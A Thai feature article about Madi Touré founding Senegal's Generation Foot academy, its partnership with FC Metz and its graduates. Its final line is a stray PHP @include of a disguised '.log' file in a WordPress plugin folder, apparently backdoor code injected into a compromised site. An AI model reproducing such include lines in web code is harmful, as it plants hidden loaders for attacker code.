Generation foot ทุกอย่างมันเริ่มจาก โต๊ะ 1 ตัว ฟุตบอล 2 ลูก

ในช่วงไม่กี่ปีที่ผ่านมา เราไม่สามารถเถียงได้เลยว่า ประเทศ “เซเนกัล” ประเทศเล็กๆให้แถบแอฟริกาตะวันตก ที่มีดาวรุ่งในวงการฟุตบอลอยู่เยอะ วันนี้ Ballteng 88 จะพาทุกท่านมาทำความรู้จักกับ Generation foot ศูนย์ฝึกฟุตบอล ที่เริ่มต้นจากการมีเพียง โต๊ะ 1 ตัว และ ลูกฟุตบอลเพียง 2 ลูก

แอฟริกาทวีปแห่งความยากจน?

   เราคงได้เห็นตามภาพทางอินเตอร์เน็ต ที่แสดงให้เห็นว่าชีวิตในแอฟริกามันไม่ได้ง่าย เพราะ 10 อันดับประเทศที่ยากจนที่สุดในโลก ล้วนมาจากทวีปแอฟริกาทั้งนั้น แต่นี้ก็คือ เหตุผลสำคัญ ที่ทำให้เด็กๆทุกคนที่เกิด และเติบโตที่นี่ ได้ใช้ชีวิตแบบปากกัดตีนถีบเรื่อยมา ด้วยความที่ในแถบประเทศแอฟริกา มีอาชีพหรือวิธีทำมาหากินแค่ไม่กี่อย่างให้เลิก “นักฟุตบอลอาชีพ” กลายเป็นเป้าหมายสูงสุดของเด็กที่ด้อยโอกาสหลายๆคน จนมีชาย 1 คน เขาคือ “มาดี้ ตูเร่” นักเตะกองหลังชาวเซเนกัลไร้ชื่อเสียง ที่เคยค้าแข้งให้กับทีม แบรสต์ และ ออร์เลอ็อง เขาไม่ได้มีเยอะกว่าคนอื่น แต่เขาคือบุคคลที่เข้าใจเรื่องของการให้โอกาส

ไม่มีเงินไม่ใช่ข้ออ้างในการลงมือทำ

   หลัง ตูเร่ แขวนสตั๊ดในปี 1985 เขามีความพยายามที่จะกลับบ้านเกิดและทำให้เด็กๆในประเทศ เซเนกัล ได้มีโอกาสแบบเขา “ผมเชื่อมาตลอด ว่าประเทศ เซเนกัล เป็นประเทศที่เต็มไปด้วยนักเตะพรสวรรค์ แต่ประเทศของเราจนมาก ผมเองก็จน” ด้วยความคิดเล็กๆของเขา เขาจึงเริ่มก่อตั้ง Generation foot ในปี 2000 แม้เขาต้องหาสนามชั่วคราวตามทุ่งหญ้า เพื่อให้นักเรียนของเขาได้ฝึกซ้อม เขานำโครงการนี้ไปเสนอกับนายทุนหลายที่ แต่เขาคือนักฟุตบอลไร้ชื่อ ไม่ใช่นักธุรกิจรายใหญ่ เขาโดน
ปฏิเสธ แบบไม่ใยดี “เรื่องนี้ฟังดูบ้าๆ หน่อยนะ เราเริ่มกันมาจากศูนย์เลยจะบอกแบบนั้นก็ได้ ตอนแรกที่ผมเปิดศูนย์ฝึก ผมมีแค่ โต๊ะ 1 ตัว กับลูกบอล 2 ลูก แค่นั้นแหละ” มาดี้ ตูเร่ เล่าต่อ
“แทบไม่มีคนเชื่อผมหรอก แต่ผมมี Road map มีเป้าหมาย มีการประเมินจากตัวผมเองตลอด ผมมั่นใจว่าผมสามารถจุดไฟให้มันติดได้ แต่ผมต้องการความช่วยเหลือ ผมอาจจะล้มเหลวในการเป็นนักฟุตบอลอาชีพ แต่ผมมั่นใจว่าผมสามารถเป็นต้นแบบในการสร้างความมุ่งมั่นให้คนอื่นได้”
ในตอนแรก เขาได้ฝึกเด็กๆในแบบที่เขาวางแผน เพื่อให้เด็กๆเข้าใจฟุตบอลอย่างแท้จริง แต่เมื่อถึงเวลาเลิกซ้อม ตูเร่ จะเริ่มงานหลักของเขาอีกอย่าง คือการหาสปอนเซอร์ เขาใส่สูทเดินไปตามห้างต่างๆ เพื่อไปขอทุนสนับสนุน แม้คำตอบที่พวกเขาได้รับจะคือ “ไม่” ก็ตาม
“คุณคิดว่าผมทำอะไรได้บ้าง? ผมไม่มีทางเลือกอื่นเลย นอกจากพยายามเคาะประตูทุกบานในเซเนกัล และขอความช่วยเหลือ แต่ไม่มีใครสักคนจะเชื่อมั่นในพวกเรา แถมผมยังโดนกล่าวหาว่า เป็นพวกต้มตุ๋นหลอกหลวงอีก” ตูเร่ เล่าย้อนความหลัง

ไฟที่มีเชื้อเพลิง 

  ผ่านไป 3 ปีหลังจากที่ มาดี้ ตูเร่ สร้าง Generation foot ที่เขาทำคนเดียวมาตลอด สุดท้าย ตูเร่ ตัดสินใจกลับไปฝรั่งเศส ประเทศที่เขาเคยอยู่ในช่วงค้าแข้ง และได้เข้าพบกับ สโมสร เม็ตซ์ ทีมระดับกลางไปค่อนล่างของประเทศ แม้จะเป็นทีมไม่ใหญ่ แต่ตูเร่ ไม่ยอมให้โอกาสหลุดหายมือไปแน่ “มีแค่ เม็ตซ์ จริงๆที่เขื่อมั่นในเรา” ตูเร่กล่าว จากการช่วยเหลือของทีมฟุตบอลเล็กๆ กลายเป็นการคว้าฝันครั้งใหญ่ของ ตูเร่และเด็กๆ อย่างแรกที่ทีมเม็ตซ์ มอบให้คือ “ปัจจัย 4” ไม่ว่าจะเป็นทางด้านอาหารหรืออุปกรณ์กีฬา

  ตูเร่ รู้ดีแก่ใจ ว่าไม่ใช่เด็กทุกคนในนี้จะได้ไปค้าแข้งที่ต่างประเทศ เพราะโลกนี้มีทรัพยากรไม่พอให้คนทั้งโลกประสบความสำเร็จ เขาจึงมอบสิ่งที่มีค่ามากกว่าทรัพย์สินใดๆ นั้นคือ “ความรู้” สิ่งที่จะติดตัวเด็กๆทุกคนไปจนตาย

ฟ้าหลังฝนสวยงามเสมอ

   เม็ตซ์ และ Generation foot กลายเป็นการจับคู่ที่ลงตัว สิ่งที่ทีมเม็ตซ์จะได้รับ นักเตะจาก Generation foot ที่มีพร้อมทั้งศาสตร์ฟุตบอล และมีความรู้อ่านออกเขียนได้ ซึ่งคุณสมบัติเหล่านี้ จำเป็นมากในการค้าแข่งในต่างประเทศ ในขณะที่ Generation foot ได้รับสิ่งที่เรียกว่า “การพัฒนาที่ยั่งยืน”

พวกเขาได้ค่าตัวจากการปล่อยนักเตะในศูนย์ฝึกให้กับเม็ตซ์ ซึ่งเงินจำนวนนั้น ได้มาต่อทุนให้กับเด็กๆในศูนย์ฝึก เพื่อเพิ่มโอการให้พวกเขาเจอชีวิตที่ดีขึ้น  “ทุกครั้งที่มีการขายนักเตะ ผมดีใจมาก นักเตะที่ย้ายออกไป 1 คน ค่าตัวของพวกเขาสามารถเปลี่ยนเป็นค่าอาหารให้เด็กๆในศูนย์ฝึกอีก 100 คน เราจะได้พื้นที่ที่มีหลังค่าคอยคุ้มหัวพวกเขา เป้าหมายของโรงเรียนเราเป็นแบบนี้ไม่รู้จบ”

ซาดิโอ มาเน่, คาลิดู คูลิบาลี่ และ อิสไมล่า ซาร์ คือผลผลิตของ Generation foot ที่ทำให้ศูนย์ฝึกได้เงินก้อนโต และเป็นเป้าหมายให้เด็กๆในประเทศเซเนกัล ก้าวข้ามให้ยิ่งใหญ่กว่าต้นแบบของเขาเอง

ทุกอย่างที่ มาดี้ ตูเร่ ทำ แสดงให้เห็นแล้วว่า ทุกอย่างเป็นจริงได้เสมอ ได้เราได้ลงมือทำ

@include "wp-content/plugins/wp-file-manager/lib/codemirror/mode/rpm/include/8807.log";